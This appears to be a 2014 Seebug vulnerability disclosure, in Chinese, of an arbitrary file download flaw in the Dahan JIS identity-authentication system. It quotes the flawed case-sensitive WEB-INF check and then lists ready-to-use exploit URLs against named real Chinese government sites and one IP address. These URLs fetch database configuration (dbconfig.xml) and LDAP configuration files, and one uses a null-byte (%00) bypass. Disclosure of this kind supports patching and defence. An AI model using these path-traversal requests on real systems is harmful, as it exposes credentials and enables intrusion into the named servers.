大汉版通身份认证JIS系统任意文件下载漏洞

2014-01-26T00:00:00
ID SSV:93881
Type seebug
Reporter Root
Modified 2014-01-26T00:00:00

Description

简要描述:

大汉版通用登录JIS系统任意文件下载漏洞

详细说明:

界面:

<img src="https://images.seebug.org/upload/201401/26105926dbb7ae7dbef246c271df993903d50aa8.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">

jis任意文件下载。至少WIN下一般都可以通杀,个别版本加了权限验证需要登录,但是我觉得只要登录后的身份合适,在win下都通杀的。

漏洞证明:

``` if(strFilePath.indexOf("WEB-INF")!=-1){ LogWriter.debug("下载文件不存在!"); out.println("<script>alert('file not exist!');history.back();</script>"); return; }

//判断文件是否存在
File file = new File(strFilePath);
if (!file.exists() || file.getName().endsWith(".jsp")) {
    LogWriter.debug("下载文件不存在!");
    out.println("&lt;script&gt;alert('file not exist!');history.back();&lt;/script&gt;");
    return;
}

```

对大小写敏感的判断在win下根本没用啊 http://management.ysx.gov.cn/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml

<img src="https://images.seebug.org/upload/201401/261059478a10d39a643737c7072b9ee581c0ae38.png" alt="image003.png" width="600" onerror="javascript:errimg(this);">

http://ln-n-tax.gov.cn/jis/down.jsp?pathfile=WEB-INF/config/dbconfig.xml

<img src="https://images.seebug.org/upload/201401/26110016c12a97a28ebd14929a822b34f82d03c7.png" alt="image005.png" width="600" onerror="javascript:errimg(this);">

http://jis.sdds.gov.cn/jis/down.jsp?pathfile=down.jsp%00

<img src="https://images.seebug.org/upload/201401/261100426d0546ce66fac4732523c6cab76c77a6.png" alt="image006.png" width="600" onerror="javascript:errimg(this);">

http://210.75.196.69/jis/down.jsp?pathfile=portlet/gmail/ldapconf.xml

<img src="https://images.seebug.org/upload/201401/261101025ee0ae51aa5b46dc2d28510b2466b056.png" alt="image007.png" width="600" onerror="javascript:errimg(this);">

http://leader.beijing.gov.cn/jis/down.jsp?pathfile=portlet/gmail/ldapconf.xml